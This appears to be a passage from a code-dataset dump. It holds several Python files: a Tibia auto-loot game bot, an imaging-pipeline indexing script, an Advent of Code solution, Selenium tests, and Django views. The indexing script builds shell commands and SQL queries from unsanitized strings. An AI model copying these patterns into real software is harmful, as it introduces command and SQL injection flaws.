"torchvision.transforms.Compose", "line_number": 235, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 235, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 236, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 236, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 237, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 237, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 244, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "9798336959", "text": "import time\n\nfrom CaveBot.Player import Player\nfrom ScreenAnalizerPackage import ScreenRegion\nfrom ScreenAnalizerPackage import Position\nfrom ScreenAnalizerPackage import PositionError\nfrom ScreenAnalizerPackage import Coordinate\nfrom threading import Event\nfrom FilesystemPackage import Cv2File\nfrom queue import Queue\nimport numpy as np\nimport cv2\n\n\nclass AutoLoot:\n def __init__(self, player: Player, walk_event: Event, combat_event: Event):\n self.player = player\n self.walk_event = walk_event\n self.combat_event = combat_event\n\n def loot(self, frame: np.array) -> None:\n try:\n if self.walk_event.is_set() or self.combat_event.is_set():\n return\n\n position = self.player.position(frame)\n\n cv2.rectangle(frame, (position.start_x, position.start_y), (position.end_x, position.end_y), (255, 0, 0), 1)\n\n grey_scale_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n looting_area = self.__create_looting_area(position)\n\n cv2.rectangle(frame, (looting_area.start_x, looting_area.start_y), (looting_area.end_x, looting_area.end_y), (255, 0, 0), 1)\n\n roi_looting_area = grey_scale_frame[looting_area.start_y: looting_area.end_y, looting_area.start_x: looting_area.end_x]\n\n corpse_template = Cv2File.load_image('Wiki/Ui/Battle/Mobs/MountainTroll/mountain_troll_corpse.png')\n\n match = cv2.matchTemplate(roi_looting_area, corpse_template, cv2.TM_CCOEFF_NORMED)\n\n # match_locations = (y_match_coords, x_match_coords) >= similarity more than threshold\n match_locations = np.where(match >= 0.2)\n\n # paired_match_locations = [(x, y), (x, y)]\n paired_match_locations: list[tuple[int, int]] = list(zip(*match_locations[::-1]))\n\n box_to_draw = []\n\n for match_location in paired_match_locations:\n (roi_relative_start_x, roi_relative_start_y) = match_location\n\n roi_relative_end_y, roi_relative_end_x = corpse_template.shape\n\n start_x = roi_relative_start_x + looting_area.start_x\n start_y = roi_relative_start_y + looting_area.start_y\n\n end_x = start_x + roi_relative_end_x\n end_y = start_y + roi_relative_end_y\n\n box_to_draw.append((start_x, start_y, end_x, end_y))\n\n grouped_boxes, _ = cv2.groupRectangles(box_to_draw, groupThreshold=1, eps=0.1)\n\n for grouped_box in grouped_boxes:\n start_x, start_y, end_x, end_y = grouped_box\n\n cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (255, 0, 255), 1)\n\n screen_region = ScreenRegion(start_x, end_x, start_y, end_y)\n\n click_point = Coordinate.from_screen_region(screen_region)\n\n self.player.loot(click_point)\n\n time.sleep(2)\n\n self.walk_event.set()\n\n except PositionError:\n pass\n\n def __create_looting_area(self, player_position: Position) -> ScreenRegion:\n start_x = player_position.start_x - 60\n end_x = player_position.end_x + 60\n start_y = player_position.start_y - 60\n end_y = player_position.end_y + 60\n\n return ScreenRegion(start_x, end_x, start_y, end_y)", "repo_name": "Adriein/TibiaAcBot", "sub_path": "CaveBot/AutoLootLegacy.py", "file_name": "AutoLootLegacy.py", "file_ext": "py", "file_size_in_byte": 3296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "CaveBot.Player.Player", "line_number": 16, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 34, "usage_type": "call"}, {"api_name": "FilesystemPackage.Cv2File.load_image", "line_number": 38, "usage_type": "call"}, {"api_name": "FilesystemPackage.Cv2File", "line_number": 38, "usage_type": "name"}, {"api_name": "cv2.matchTemplate", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.groupRectangles", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 68, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.ScreenRegion", "line_number": 70, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.Coordinate.from_screen_region", "line_number": 72, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.Coordinate", "line_number": 72, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.PositionError", "line_number": 80, "usage_type": "name"}, {"api_name": "ScreenAnalizerPackage.Position", "line_number": 83, "usage_type": "name"}, {"api_name": "ScreenAnalizerPackage.ScreenRegion", "line_number": 89, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.ScreenRegion", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "75336980963", "text": "import argparse\nimport os\nimport subprocess\nimport sys\nimport time\nimport colorlog\nimport requests\nimport MySQLdb\nfrom pymongo import MongoClient\nfrom tqdm import tqdm\n\n\n# SQL statements\nSQL = {\n 'OVERDUE': \"SELECT i.family,ipd.value AS data_set,ips.value AS slide_code,\"\n + \"i.name,i.line FROM image_vw i JOIN image_property_vw ipd ON \"\n + \"(i.id=ipd.image_id AND ipd.type='data_set') JOIN image_property_vw ips \"\n + \"ON (i.id=ips.image_id AND ips.type='slide_code') WHERE i.family NOT \"\n + \"LIKE 'simpson%' AND i.id NOT IN (SELECT image_id FROM \"\n + \"image_property_vw WHERE type='bits_per_sample') AND \"\n + \"TIMESTAMPDIFF(HOUR,i.create_date,NOW()) > 8\",\n 'ALL': \"SELECT i.family,ipd.value AS data_set,ips.value AS slide_code,\"\n + \"i.name,i.line FROM image_vw i JOIN image_property_vw ipd ON \"\n + \"(i.id=ipd.image_id AND ipd.type='data_set') JOIN image_property_vw ips \"\n + \"ON (i.id=ips.image_id AND ips.type='slide_code') WHERE i.family NOT \"\n + \"LIKE 'simpson%' AND i.id NOT IN (SELECT image_id FROM \"\n + \"image_property_vw WHERE type='bits_per_sample')\",\n 'OVERRIDE': \"SELECT i.family,ipd.value AS data_set,ips.value AS slide_code,\"\n + \"i.name,i.line FROM image_vw i JOIN image_property_vw ipd ON \"\n + \"(i.id=ipd.image_id AND ipd.type='data_set') JOIN image_property_vw ips \"\n + \"ON (i.id=ips.image_id AND ips.type='slide_code') WHERE i.family NOT \"\n + \"LIKE 'simpson%'\",\n 'SINGLE': \"SELECT family,data_set,slide_code,name,line FROM image_data_mv WHERE \"\n + \"id=%s\",\n}\n# JACS call details\nPREFIX = {\"DISCOVER\": 'action=invokeOpByName&name=ComputeServer%3Aservice%3DSampleDataManager&&methodName=runSampleDiscovery&arg0=',\n \"PROCESS\": 'action=invokeOp&name=ComputeServer%3Aservice%3DSampleDataManager&methodIndex=18&methodName=runSampleOrFolder&arg0='}\nSUFFIX = {\"DISCOVER\": '&argType=java.lang.String\" http://jacs-data2.int.janelia.org:8180/jmx-console/HtmlAdaptor',\n \"PROCESS\": '&arg1=True&arg2=True&arg3=True&arg4=True&arg5=\" http://jacs-data3.int.janelia.org:8180/jmx-console/HtmlAdaptor'}\n# Counters\nCOUNT = {'failure': 0, 'found': 0, 'skipped': 0, 'success': 0}\nDSDICT = {}\nINDEXED = {}\nIN_FLYCORE = {}\n# Configuration\nCONFIG = {'config': {'url': 'http://config.int.janelia.org/'}}\nCONN = dict()\nCURSOR = dict()\n\n# -----------------------------------------------------------------------------\n\n\ndef call_responder(server, endpoint, post=''):\n url = CONFIG[server]['url'] + endpoint\n try:\n if post:\n req = requests.post(url, json=post)\n else:\n req = requests.get(url)\n except requests.exceptions.RequestException as err:\n LOGGER.critical(err)\n sys.exit(-1)\n if req.status_code in (200, 201):\n return req.json()\n if req.status_code == 404:\n return ''\n try:\n LOGGER.critical('%s: %s', str(req.status_code), req.json()['rest']['message'])\n except:\n LOGGER.critical('%s: %s', str(req.status_code), req.text)\n sys.exit(-1)\n\n\ndef sql_error(err):\n try:\n print('MySQL error [%d]: %s' % (err.args[0], err.args[1]))\n except IndexError:\n print('MySQL error: %s' % err)\n sys.exit(-1)\n\n\ndef db_connect(dbd):\n \"\"\" Connect to a database\n Keyword arguments:\n dbd: database dictionary\n Returns:\n connector and cursor\n \"\"\"\n LOGGER.info(\"Connecting to %s on %s\", dbd['name'], dbd['host'])\n try:\n conn = MySQLdb.connect(host=dbd['host'], user=dbd['user'],\n passwd=dbd['password'], db=dbd['name'])\n except MySQLdb.Error as err:\n sql_error(err)\n try:\n cursor = conn.cursor(MySQLdb.cursors.DictCursor)\n return conn, cursor\n except MySQLdb.Error as err:\n sql_error(err)\n\n\ndef connect_databases(database):\n try:\n mdb = database['jacs-mongo']['prod']['read']\n client = MongoClient(mdb['host'], replicaSet=mdb['replicaset'],\n username=mdb['user'], password=mdb['password'])\n dbm = client.jacs\n LOGGER.info(f\"Connected to {mdb['name']} on {mdb['host']} as {mdb['user']}\")\n cursor = dbm.dataSet.find({'sageGrammarPath':{'$exists':True}},\n {'_id':0, 'identifier':1, 'sageConfigPath':1,\n 'sageGrammarPath':1})\n except Exception as err:\n LOGGER.error('Could not connect to Mongo: %s' % (err))\n sys.exit(-1)\n for dset in cursor:\n DSDICT[dset['identifier']] = {'config': dset['sageConfigPath'],\n 'grammar': dset['sageGrammarPath']}\n (CONN['sage'], CURSOR['sage']) = db_connect(database['sage']['prod'])\n\n\ndef initialize_program():\n \"\"\" Initialize\n \"\"\"\n global CONFIG # pylint: disable=W0603\n data = call_responder('config', 'config/db_config')\n connect_databases(data['config'])\n data = call_responder('config', 'config/rest_services')\n CONFIG = data['config']\n\n\ndef get_entity(line, slide_code):\n sid = line + '-' + slide_code\n response = call_responder('jacs', 'data/sample?name=' + sid)\n if not response:\n LOGGER.error(\"Could not find sample ID for %s\", sid)\n return ''\n return response[0]['_id']\n\n\ndef discover_and_process(slide_code):\n for code in sorted(slide_code):\n command = 'wget -v --post-data=\"%s%s%s' % (PREFIX['DISCOVER'], code,\n SUFFIX['DISCOVER'])\n LOGGER.debug(command)\n os.system(command)\n time.sleep(3)\n entity = get_entity(slide_code[code], code)\n if entity:\n command = 'wget -v --post-data=\"%s%s%s' % (PREFIX['PROCESS'], entity,\n SUFFIX['PROCESS'])\n LOGGER.debug(command)\n os.system(command)\n\n\ndef in_flycore(line):\n if line in IN_FLYCORE:\n return IN_FLYCORE[line]\n if '_IS' in line or '_IL' in line:\n IN_FLYCORE[line] = True\n return True\n response = call_responder(\"flycore\", \"?request=linedata;line=\" + line)\n if not response['linedata']:\n IN_FLYCORE[line] = False\n else:\n IN_FLYCORE[line] = True\n return IN_FLYCORE[line]\n\n\ndef process_images():\n mode = 'ALL' if ARG.ALL else 'OVERDUE'\n if ARG.OVERRIDE:\n mode = 'OVERRIDE'\n stmt = SQL[mode]\n if ARG.SLIDE:\n addition = '%' + ARG.SLIDE + '%'\n stmt = stmt.replace(\"sample')\",\n \"sample') AND ips.value LIKE '\" + addition + \"'\")\n if ARG.DATASET:\n addition = '%' + ARG.DATASET + '%'\n stmt = stmt.replace(\"sample')\",\n \"sample') AND ipd.value LIKE '\" + addition + \"'\")\n if ARG.OVERRIDE:\n stmt += \" AND ips.value LIKE '\" + addition + \"'\"\n rows = list()\n if ARG.IDS:\n idfile = open(ARG.IDS, \"r\")\n for line in idfile:\n line = line.rstrip()\n try:\n CURSOR['sage'].execute(SQL['SINGLE'], (line, ))\n row = CURSOR['sage'].fetchone()\n rows.append(row)\n except MySQLdb.Error as err:\n sql_error(err)\n idfile.close()\n else:\n try:\n LOGGER.debug(stmt)\n CURSOR['sage'].execute(stmt)\n rows = CURSOR['sage'].fetchall()\n except MySQLdb.Error as err:\n sql_error(err)\n\n lsm = dict()\n slide_code = dict()\n if ARG.TEST:\n LOGGER.warning(\"Test mode: will not send transactions\")\n for row in tqdm(rows):\n config = ''\n grammar = ''\n COUNT['found'] += 1\n LOGGER.info(\"%s\\t%s\\t%s\\t%s\", row['family'], row['data_set'],\n row['slide_code'], row['name'])\n if not in_flycore(row['line']):\n LOGGER.error(\"Line %s is not in FlyCore\", row['line'])\n continue\n if row['family'] == 'rubin_chacrm':\n config = '/groups/scicompsoft/informatics/data/rubin_light_imagery-config.xml'\n grammar = '/misc/sc/pipeline/grammar/chacrm_sage.gra'\n elif row['data_set'] in DSDICT:\n config = DSDICT[row['data_set']]['config']\n grammar = DSDICT[row['data_set']]['grammar']\n grammar = grammar.replace(\"/misc/local/pipeline\", \"/misc/sc/pipeline\")\n else:\n LOGGER.error('Could not determine configuration and grammar '\n + 'for data set %s', row['data_set'])\n lsm.setdefault(row['data_set'], []).append(row['name'])\n if config and grammar and ARG.INDEX:\n slide_code[row['slide_code']] = row['line']\n index_image(config, grammar, row['name'], row['data_set'])\n operation = 'indexed'\n if not (ARG.INDEX or ARG.DISCOVER):\n operation = 'indexed/discovered'\n for dataset, lsmlist in lsm.items():\n LOGGER.info(\"Running indexing/discovery on data set \" + dataset\n + \" with \" + str(len(lsmlist)) + \" LSM(s)\")\n if sys.version_info[0] == 2:\n carr = xrange(0, len(lsmlist), 50)\n else:\n carr = range(0, len(lsmlist), 50)\n chunks = [lsmlist[i:i + 50] for i in carr]\n for sublist in chunks:\n post = {\"lsmNames\": sublist}\n LOGGER.debug(\" Posting \" + str(len(sublist)) + \" LSM(s)\")\n if ARG.TEST:\n COUNT['success'] += len(sublist)\n INDEXED[dataset] = INDEXED.setdefault(dataset, 0) + len(sublist)\n else:\n print(f\"process/owner/system/dataSet/{dataset}/lsmPipelines\")\n print(post)\n call_responder('jacs', 'process/owner/system/dataSet/'\n + dataset + '/lsmPipelines', post)\n COUNT['success'] += len(sublist)\n INDEXED[dataset] = INDEXED.setdefault(dataset, 0) + len(sublist)\n print('Unindexed images: %d' % COUNT['found'])\n if COUNT['skipped']:\n print('Skipped images: %d' % COUNT['skipped'])\n print('Images successfully %s: %d' % (operation, COUNT['success']))\n if INDEXED:\n for dset in sorted(INDEXED):\n print(' %s: %d' % (dset, INDEXED[dset]))\n if COUNT['failure']:\n print('Images failing indexing: %d' % COUNT['failure'])\n if slide_code and (ARG.INDEX or ARG.DISCOVER) and not ARG.TEST:\n discover_and_process(slide_code)\n\n\ndef index_image(config, grammar, name, data_set):\n command = ['perl', '/groups/scicompsoft/informatics/bin/sage_loader.pl', '-config',\n config, '-grammar', grammar, '-item', name, '-lab',\n 'flylight', '-verbose', '-description',\n '\"Image load from indexing_cleanup\"']\n LOGGER.info('Processing %s %s', data_set, name)\n LOGGER.debug(' ' + ' '.join(command))\n with open(\"sage_loader_commands.sh\", \"a\", encoding=\"ascii\") as OUTSTREAM:\n OUTSTREAM.write(' '.join(command) + \"\\n\")\n try:\n if ARG.TEST:\n tmp = 'OK'\n else:\n tmp = subprocess.check_output(command, stderr=subprocess.STDOUT)\n if (tmp.find('Cannot read file') != -1) or \\\n (tmp.find('Permission denied') != -1) or \\\n (tmp.find('Unable to uncompress the stack') != -1):\n LOGGER.error(' Could not read LSM file')\n COUNT['failure'] += 1\n elif tmp.find('Incomplete image processing') != -1:\n LOGGER.error(' Image processing failed')\n COUNT['failure'] += 1\n else:\n COUNT['success'] += 1\n INDEXED[data_set] = INDEXED.setdefault(data_set, 0) + 1\n except subprocess.CalledProcessError as err:\n print(err.output)\n COUNT['failure'] += 1\n except Exception as err:\n print(err)\n COUNT['failure'] += 1\n\n\n# -----------------------------------------------------------------------------\n\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser(description='Find and index/discover newly tmogged imagery')\n PARSER.add_argument('--ids', dest='IDS', action='store',\n help='File of image IDs (optional)')\n PARSER.add_argument('--data_set', dest='DATASET', action='store',\n help='Data set (optional)')\n PARSER.add_argument('--slide_code', dest='SLIDE', action='store',\n help='Slide code (optional)')\n PARSER.add_argument('--index', action='store_true', dest='INDEX',\n default=False, help='Run indexing')\n PARSER.add_argument('--discover', action='store_true', dest='DISCOVER',\n default=False, help='Run discovery and image processing')\n PARSER.add_argument('--verbose', action='store_true', dest='VERBOSE',\n default=False, help='Turn on verbose output')\n PARSER.add_argument('--debug', action='store_true', dest='DEBUG',\n default=False, help='Turn on debug output')\n PARSER.add_argument('--test', action='store_true', dest='TEST',\n default=False,\n help='Test mode - does not actually run the indexer or discovery')\n PARSER.add_argument('--all', action='store_true', dest='ALL',\n default=False,\n help='Selects all images, not just overdue ones')\n PARSER.add_argument('--override', action='store_true', dest='OVERRIDE',\n default=False,\n help='Selects all images regardless of prior load')\n ARG = PARSER.parse_args()\n LOGGER = colorlog.getLogger()\n ATTR = colorlog.colorlog.logging if \"colorlog\" in dir(colorlog) else colorlog\n if ARG.DEBUG:\n LOGGER.setLevel(ATTR.DEBUG)\n elif ARG.VERBOSE:\n LOGGER.setLevel(ATTR.INFO)\n else:\n LOGGER.setLevel(ATTR.WARNING)\n HANDLER = colorlog.StreamHandler()\n HANDLER.setFormatter(colorlog.ColoredFormatter())\n LOGGER.addHandler(HANDLER)\n initialize_program()\n process_images()\n", "repo_name": "JaneliaSciComp/ImagingEcosystem", "sub_path": "bin/indexing_cleanup.py", "file_name": "indexing_cleanup.py", "file_ext": "py", "file_size_in_byte": 14157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 58, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 80, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 92, "usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 94, "usage_type": "attribute"}, {"api_name": "MySQLdb.cursors", "line_number": 97, "usage_type": "attribute"}, {"api_name": "MySQLdb.Error", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 106, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 115, "usage_type": "call"}, {"api_name": "os.system", "line_number": 146, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 147, "usage_type": "call"}, {"api_name": "os.system", "line_number": 153, "usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 194, "usage_type": "attribute"}, {"api_name": "MySQLdb.Error", "line_number": 202, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 209, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 238, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 282, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 282, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 294, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 306, "usage_type": "call"}, {"api_name": "colorlog.getLogger", "line_number": 331, "usage_type": "call"}, {"api_name": "colorlog.colorlog", "line_number": 332, "usage_type": "attribute"}, {"api_name": "colorlog.StreamHandler", "line_number": 339, "usage_type": "call"}, {"api_name": "colorlog.ColoredFormatter", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "27927497991", "text": "from typing import List\nfrom collections import Counter\nfrom copy import deepcopy\nfrom pathlib import Path\n\n\nAdaptor = int\n\n\ndef get_joltage_differences(adaptors: List[Adaptor]) -> List[int]:\n ordered_adaptors = deepcopy(adaptors)\n ordered_adaptors.extend([0, max(adaptors) + 3])\n ordered_adaptors.sort()\n differences = [this - previous for this, previous in zip(ordered_adaptors[1:], ordered_adaptors[:-1])]\n return differences\n\n\ndef get_joltage_difference_distribution(adaptors: List[Adaptor]) -> Counter:\n joltage_differences = get_joltage_differences(adaptors)\n return Counter(joltage_differences)\n\n\ndef get_valid_adaptor_combinations(joltage_differences: List[int]) -> int:\n\n if 3 in joltage_differences:\n first_3 = joltage_differences.index(3)\n subset_before = joltage_differences[:first_3]\n subset_after = joltage_differences[first_3+1:]\n return get_valid_adaptor_combinations(subset_before) * get_valid_adaptor_combinations(subset_after)\n\n if len(joltage_differences) == 0:\n return 1\n if joltage_differences[0] > 3:\n return 0\n if len(joltage_differences) == 1:\n return 1\n\n remaining_differences_if_included = joltage_differences[1:]\n combinations_including_this_adaptor = get_valid_adaptor_combinations(remaining_differences_if_included)\n\n remaining_differences_if_excluded = joltage_differences[1:]\n remaining_differences_if_excluded[0] += joltage_differences[0]\n combinations_excluding_this_adaptor = get_valid_adaptor_combinations(remaining_differences_if_excluded)\n\n return combinations_including_this_adaptor + combinations_excluding_this_adaptor\n\n\ndef main(file_path: Path = Path(__file__).parent / 'input_files' / 'day_10.txt'):\n with open(file_path) as f:\n adaptors = [int(line.strip()) for line in f.readlines()]\n joltage_distribution = get_joltage_difference_distribution(adaptors)\n print(f'1-jolt * 3-jolt is {joltage_distribution[1] * joltage_distribution[3]}')\n joltage_differences = get_joltage_differences(adaptors)\n adaptor_combinations = get_valid_adaptor_combinations(joltage_differences)\n print(f'there are {adaptor_combinations} combinations of adaptors that work')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "mikealfare/advent-of-code-2020", "sub_path": "src/advent_of_code/day_10.py", "file_name": "day_10.py", "file_ext": "py", "file_size_in_byte": 2259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "38232702199", "text": "\nfrom datetime import datetime\nfrom unittest import mock\n\nimport pytest\nfrom selenium.webdriver.common.by import By\nimport selenium\n\nfrom test.selenium import SeleniumTest\nfrom terrareg.models import ModuleVersion, Namespace, Module, ModuleProvider\nfrom .test_data import one_namespace_test_data\n\nclass TestNamespaceList(SeleniumTest):\n \"\"\"Test namespace list page.\"\"\"\n\n def test_namespace_list_page(self):\n \"\"\"Test namespace list page.\"\"\"\n self.selenium_instance.get(self.get_url('/modules'))\n\n assert self.selenium_instance.title == 'Namespaces - Terrareg'\n\n # Get content section\n content = self.wait_for_element(By.ID, 'namespace-list-content')\n\n # Check title\n assert content.find_element(By.TAG_NAME, 'h1').text == 'Namespaces'\n\n expected_namespaces = [\n ['emptynamespace', 'emptynamespace'],\n ['javascriptinjection', 'javascriptinjection'], ['moduledetails', 'moduledetails'],\n ['moduleextraction', 'moduleextraction'], ['modulesearch', 'modulesearch'],\n ['modulesearch-contributed', 'modulesearch-contributed'],\n ['modulesearch-trusted', 'modulesearch-trusted'], ['mostrecent', 'mostrecent'],\n ['mostrecentunpublished', 'mostrecentunpublished'], ['onlybeta', 'onlybeta'],\n ['onlyunpublished', 'onlyunpublished'], ['real_providers', 'real_providers'],\n ['relevancysearch', 'relevancysearch'], ['repo_url_tests', 'repo_url_tests'],\n ['searchbynamespace', 'searchbynamespace'], ['testmodulecreation', 'testmodulecreation'],\n ['testnamespace', 'testnamespace'], ['trustednamespace', 'trustednamespace'],\n ['unpublished-beta-version-module-providers', 'unpublished-beta-version-module-providers'],\n ['version-constraint-test', 'version-constraint-test'],\n # Namespace with a display name\n ['A Display Name', 'withdisplayname']\n ]\n\n # Check namespaces\n table_body = content.find_element(By.ID, 'namespaces-table-data')\n for namespace_tr in table_body.find_elements(By.TAG_NAME, 'tr'):\n expected_name, expected_id = expected_namespaces.pop(0)\n\n link = namespace_tr.find_element(By.TAG_NAME, 'a')\n assert link.text == expected_name\n assert link.get_attribute('href') == self.get_url(f'/modules/{expected_id}')\n\n\nclass TestNamespaceListSingleNamespace(SeleniumTest):\n \"\"\"Test namespace list page with single namespace\"\"\"\n\n _TEST_DATA = one_namespace_test_data\n _USER_GROUP_DATA = None\n\n def test_namespace_list_page_redirect(self):\n \"\"\"Test namespace list page with one namespace.\"\"\"\n self.selenium_instance.get(self.get_url('/modules'))\n\n # Ensure page is redirected to namespace page\n self.assert_equals(lambda: self.selenium_instance.current_url, self.get_url('/modules/testnamespace'))\n\n\nclass TestNamespaceListNoNamespaces(SeleniumTest):\n \"\"\"Test namespace list page with no namespaces\"\"\"\n\n _TEST_DATA = {}\n _USER_GROUP_DATA = None\n\n def test_namespace_list_page_warning(self):\n \"\"\"Test namespace list page with no namespaces.\"\"\"\n self.selenium_instance.get(self.get_url('/modules'))\n\n self.assert_equals(lambda: self.selenium_instance.current_url, self.get_url('/initial-setup'))\n", "repo_name": "MatthewJohn/terrareg", "sub_path": "test/selenium/test_namespace_list.py", "file_name": "test_namespace_list.py", "file_ext": "py", "file_size_in_byte": 3346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 169, "dataset": "github-code", "pt": "52", "api": [{"api_name": "test.selenium.SeleniumTest", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 26, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 47, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "test.selenium.SeleniumTest", "line_number": 55, "usage_type": "name"}, {"api_name": "test_data.one_namespace_test_data", "line_number": 58, "usage_type": "name"}, {"api_name": "test.selenium.SeleniumTest", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "18469576254", "text": "from django.shortcuts import get_object_or_404, render\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .serializers import BookmarkListSerializer, BookmarkSerializer\nfrom .models import Bookmark\nfrom stores.models import Store\nfrom reviews.models import Review\nfrom reviews.models import Hashtag\nfrom stores.serializers import StoreSerializer, StoreDetailSerializer\nfrom django.db.models import Count\n\n# Create your views here.\n\ndef custom_store_serializer(infos):\n storeList = []\n for info in infos:\n store = get_object_or_404(Store, pk=info[\"id\"])\n store_serializer = StoreDetailSerializer(store)\n imgs = []\n twitter_ids = []\n groups = set()\n for review in info[\"review_set\"]:\n if len(imgs) < 2:\n imgs.append(review[\"img_url\"])\n twitter_ids.append(review[\"twitter_id\"])\n for hashtag in review[\"hashtags\"]:\n for key, value in hashtag.items():\n if key == \"group\" and value == \"ETC\":\n groups.add(hashtag[\"singer\"])\n elif key == \"group\" and value != \"ETC\":\n groups.add(value)\n data = {\n \"store\": StoreDetailSerializer(store).data,\n \"imgs\": imgs,\n \"reviews\": twitter_ids,\n \"group\": groups,\n }\n storeList.append(data)\n return storeList\n\n\n\n@api_view(['GET','POST'])\ndef bookmark_list_create(request):\n if request.method == 'GET':\n bookmarks = request.user.bookmark_set.all()\n serializer = BookmarkListSerializer(bookmarks, many=True)\n return Response(serializer.data)\n else:\n serializer = BookmarkListSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save(user=request.user)\n\n bookmarks = request.user.bookmark_set.all()\n serializer = BookmarkListSerializer(bookmarks, many=True)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\n@api_view(['GET','PUT','DELETE'])\ndef bookmark_update_delete(request, bookmark_pk):\n bookmark = get_object_or_404(Bookmark, pk=bookmark_pk)\n if not request.user.bookmark_set.filter(pk=bookmark_pk).exists():\n return Response({'detail':'권한이 없습니다.'}, status=status.HTTP_403_FORBIDDEN)\n\n if request.method == 'GET':\n bookmark_store = bookmark.stores.all()\n serializer = StoreSerializer(bookmark_store,many=True)\n data = {\n \"title\" :bookmark.title,\n \"stores\" : custom_store_serializer(serializer.data)\n }\n return Response(data)\n\n if request.method == 'PUT':\n serializer = BookmarkListSerializer(bookmark, data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n else:\n bookmark.delete()\n \n bookmarks = request.user.bookmark_set.all()\n serializer = BookmarkListSerializer(bookmarks, many=True)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\n@api_view([\"POST\"])\ndef bookmark_add(request, store_pk):\n if request.user.is_authenticated:\n store = get_object_or_404(Store, pk=store_pk)\n ids = request.data['id']\n for i in ids:\n bookmarks = request.user.bookmark_set.filter(stores=store_pk)\n if not request.user.bookmark_set.filter(pk=i).exists():\n return Response({'detail':'권한이 없습니다.'}, status=status.HTTP_403_FORBIDDEN)\n\n if not 